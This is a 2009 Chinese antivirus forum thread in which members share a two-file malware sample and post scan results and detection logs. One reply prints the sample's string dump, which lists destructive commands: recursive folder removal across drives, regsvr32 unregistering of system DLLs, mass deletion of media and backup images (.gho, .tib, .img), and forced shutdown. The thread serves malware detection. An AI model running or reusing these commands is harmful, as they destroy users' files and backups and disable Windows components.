2个文件

显示全部楼层 · 发表于 2009-2-22 23:38:15

VirusBuster found nothing
autorun.ini 可以不用打包的

显示全部楼层 · 发表于 2009-2-22 23:52:39

Hello,

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.

显示全部楼层 · 发表于 2009-2-23 00:10:07

Ultra String Reference
Address Disassembly                            Text String
00401188 push 00416468                         (initial cpu selection)
00401188 push 00416468                         vb5!6&vb6chs.dll
00416A83 push 00416A60                         @japja
00417D07 mov    dword ptr [ebp-3C], 00416AA4    cmd /c taskkill /f /im explorer.exe
00417D31 mov    dword ptr [ebp-3C], 00416AF0    cmd /c rd c:\..........\ /s/q
00417D56 mov    dword ptr [ebp-3C], 00416B30    cmd /c rd d:\..........\ /s/q
00417D7B mov    dword ptr [ebp-3C], 00416B70    cmd /c rd e:\..........\ /s/q
00417DA0 mov    dword ptr [ebp-3C], 00416BB0    cmd /c rd f:\..........\ /s/q
00417DC5 mov    dword ptr [ebp-3C], 00416BF0    cmd /c rd g:\..........\ /s/q
00417DEA mov    dword ptr [ebp-3C], 00416C30    cmd /c rd h:\..........\ /s/q
00417E0F mov    dword ptr [ebp-3C], 00416C70    cmd /c rd i:\..........\ /s/q
00417E34 mov    dword ptr [ebp-3C], 00416CB0    cmd /c rd n:\..........\ /s/q
00417E59 mov    dword ptr [ebp-3C], 00416CF0    cmd /c rd m:\..........\ /s/q
00417E7E mov    dword ptr [ebp-3C], 00416D30    cmd /c rd x:\..........\ /s/q
00417EA3 mov    dword ptr [ebp-3C], 00416D70    regsvr32 urlmon.dll /u /s
00417EC8 mov    dword ptr [ebp-3C], 00416DA8    regsvr32 actxprxy.dll /u /s
00417EED mov    dword ptr [ebp-3C], 00416DE4    regsvr32 shdocvw.dll /u /s
00417F12 mov    dword ptr [ebp-3C], 00416E20    regsvr32 oleaut32.dll /u /s
00417F37 mov    dword ptr [ebp-3C], 00416E5C    regsvr32 /u /s nusrmgr.cpl
00417F5C mov    dword ptr [ebp-3C], 00416E98    regsvr32 /u /s mshtml.dll
00417F81 mov    dword ptr [ebp-3C], 00416ED0    regsvr32 /u /s jscript.dll
00417FA0 mov    dword ptr [ebp-3C], 00416F0C    regsvr32 /u /s shdocvw.dll
00417FCB mov    dword ptr [ebp-3C], 00416F48    regsvr32 /u /s shdocvw.dll
00417FF0 mov    dword ptr [ebp-3C], 00416F84    regsvr32 /u /s oleaut32.dll
00418015 mov    dword ptr [ebp-3C], 00416FC4    regsvr32 /u /s actxprxy.dll
0041803A mov    dword ptr [ebp-3C], 00417000    regsvr32 /u /s mshtml.dll
0041805F mov    dword ptr [ebp-3C], 00417038    regsvr32 /u /s urlmon.dll
00418084 mov    dword ptr [ebp-3C], 00417070    regsvr32 /u /s browseui.dll
004180A9 mov    dword ptr [ebp-3C], 004170AC    cmd /c del /f /s /q c:\*.avi
004180CE mov    dword ptr [ebp-3C], 004170EC    cmd /c del /f /s /q d:\*.avi
004180F3 mov    dword ptr [ebp-3C], 0041712C    cmd /c del /f /s /q e:\*.avi
00418118 mov    dword ptr [ebp-3C], 0041716C    cmd /c del /f /s /q f:\*.avi
0041813D mov    dword ptr [ebp-3C], 004171AC    cmd /c del /f /s /q g:\*.avi
00418162 mov    dword ptr [ebp-3C], 004171EC    cmd /c del /f /s /q h:\*.avi
00418187 mov    dword ptr [ebp-3C], 0041722C    cmd /c del /f /s /q c:\*.mp3
004181AC mov    dword ptr [ebp-3C], 0041726C    cmd /c del /f /s /q d:\*.mp3
004181D1 mov    dword ptr [ebp-3C], 004172AC    cmd /c del /f /s /q e:\*.mp3
004181F6 mov    dword ptr [ebp-3C], 004172EC    cmd /c del /f /s /q f:\*.mp3
0041821B mov    dword ptr [ebp-3C], 0041732C    cmd /c del /f /s /q g:\*.mp3
00418240 mov    dword ptr [ebp-3C], 0041736C    cmd /c del /f /s /q h:\*.mp3
00418265 mov    dword ptr [ebp-3C], 004173AC    cmd /c del /f /s /q c:\*.wmv
0041828A mov    dword ptr [ebp-3C], 004173EC    cmd /c del /f /s /q d:\*.wmv
004182AF mov    dword ptr [ebp-3C], 0041742C    cmd /c del /f /s /q e:\*.wmv
004182D4 mov    dword ptr [ebp-3C], 0041746C    cmd /c del /f /s /q f:\*.wmv
004182F9 mov    dword ptr [ebp-3C], 004174AC    cmd /c del /f /s /q g:\*.wmv
0041831E mov    dword ptr [ebp-3C], 004174EC    cmd /c del /f /s /q h:\*.wmv
00418343 mov    dword ptr [ebp-3C], 0041752C    cmd /c del /f /s /q c:\*.rmvb
00418368 mov    dword ptr [ebp-3C], 0041756C    cmd /c del /f /s /q d:\*.rmvb
00418387 mov    dword ptr [ebp-3C], 004175AC    cmd /c del /f /s /q e:\*.rmvb
004183B2 mov    dword ptr [ebp-3C], 004175EC    cmd /c del /f /s /q f:\*.rmvb
004183D7 mov    dword ptr [ebp-3C], 0041762C    cmd /c del /f /s /q g:\*.rmvb
004183FC mov    dword ptr [ebp-3C], 0041766C    cmd /c del /f /s /q h:\*.rmvb
00418421 mov    dword ptr [ebp-3C], 004176C4    cmd /c del /f /s /q c:\*.rm
00418446 mov    dword ptr [ebp-3C], 00417700    cmd /c del /f /s /q d:\*.rm
0041846B mov    dword ptr [ebp-3C], 0041773C    cmd /c del /f /s /q e:\*.rm
00418490 mov    dword ptr [ebp-3C], 00417778    cmd /c del /f /s /q f:\*.rm
004184B5 mov    dword ptr [ebp-3C], 004177B4    cmd /c del /f /s /q g:\*.rm
004184DA mov    dword ptr [ebp-3C], 004177F0    cmd /c del /f /s /q h:\*.rm
004184FF mov    dword ptr [ebp-3C], 0041722C    cmd /c del /f /s /q c:\*.mp3
00418524 mov    dword ptr [ebp-3C], 0041726C    cmd /c del /f /s /q d:\*.mp3
00418549 mov    dword ptr [ebp-3C], 004172AC    cmd /c del /f /s /q e:\*.mp3
0041856E mov    dword ptr [ebp-3C], 004172EC    cmd /c del /f /s /q f:\*.mp3
00418593 mov    dword ptr [ebp-3C], 0041732C    cmd /c del /f /s /q g:\*.mp3
004185B8 mov    dword ptr [ebp-3C], 0041736C    cmd /c del /f /s /q h:\*.mp3
004185DD mov    dword ptr [ebp-3C], 004173AC    cmd /c del /f /s /q c:\*.wmv
00418602 mov    dword ptr [ebp-3C], 004173EC    cmd /c del /f /s /q d:\*.wmv
00418627 mov    dword ptr [ebp-3C], 0041742C    cmd /c del /f /s /q e:\*.wmv
0041864C mov    dword ptr [ebp-3C], 0041746C    cmd /c del /f /s /q f:\*.wmv
00418671 mov    dword ptr [ebp-3C], 004174AC    cmd /c del /f /s /q g:\*.wmv
00418696 mov    dword ptr [ebp-3C], 004174EC    cmd /c del /f /s /q h:\*.wmv
004186BB mov    dword ptr [ebp-3C], 0041782C    cmd /c del /f /s /q  h:\*.gho
004186E0 mov    dword ptr [ebp-3C], 0041786C    cmd /c del /f /s /q  e:\*.gho
00418705 mov    dword ptr [ebp-3C], 004178AC    cmd /c del /f /s /q  f:\*.gho
0041872A mov    dword ptr [ebp-3C], 004178EC    cmd /c del /f /s /q  i:\*.gho
0041874F mov    dword ptr [ebp-3C], 0041792C    cmd /c del /f /s /q  h:\*.img
0041876E mov    dword ptr [ebp-3C], 0041796C    cmd /c del /f /s /q  e:\*.img
00418799 mov    dword ptr [ebp-3C], 004179AC    cmd /c del /f /s /q  f:\*.img
004187BE mov    dword ptr [ebp-3C], 004179EC    cmd /c del /f /s /q  i:\*.img
004187E3 mov    dword ptr [ebp-3C], 00417A3C    cmd /c del /f /s /q  h:\*.tib
00418808 mov    dword ptr [ebp-3C], 00417A7C    cmd /c del /f /s /q  e:\*.tib
0041882D mov    dword ptr [ebp-3C], 00417ABC    cmd /c del /f /s /q  f:\*.tib
00418852 mov    dword ptr [ebp-3C], 00417AFC    cmd /c del /f /s /q  i:\*.tib
004188AA push 00417B5C                         -t 1 -f -r -c
004188B6 push 00417B44                         shutdown

显示全部楼层 · 发表于 2009-2-23 10:32:09

过MCAFEE8.7

显示全部楼层 · 发表于 2009-2-23 10:36:38

KIS8.0 Kill

2009-2-23 10:35:37 http://bbs.kafan.cn/attachment.p ... 56514//explorer.exe Internet Explorer 拒绝: Worm.Win32.Downloader.abw

2009-2-23 10:35:37 http://bbs.kafan.cn/attachment.p ... 56514//explorer.exe Internet Explorer 检测到威胁: Worm.Win32.Downloader.abw

显示全部楼层 · 发表于 2009-2-23 13:58:00

avg found nothing

显示全部楼层 · 发表于 2009-2-23 14:12:32

2009-2-23 14:12:13 检测到威胁: Trojan.Win32.Agent2.eck C:\Documents and Settings\Administrator\桌面\2\player.exe
2009-2-23 14:12:13 检测到威胁: Worm.Win32.Downloader.abw C:\Documents and Settings\Administrator\桌面\2\explorer.exe
2009-2-23 14:12:16 已删除: Worm.Win32.Downloader.abw C:\Documents and Settings\Administrator\桌面\2\explorer.exe
2009-2-23 14:12:16 已删除: Trojan.Win32.Agent2.eck C:\Documents and Settings\Administrator\桌面\2\player.exe

显示全部楼层 · 发表于 2009-2-23 14:17:02

2009-2-23 14:15:13 检测到威胁: Trojan.Win32.Agent2.eck C:\Documents and Settings\Administrator\桌面\2.rar/player.exe

显示全部楼层 · 发表于 2009-2-23 14:17:55

nod未报

[病毒样本] 2个文件

本帖子中包含更多资源

浏览过的版块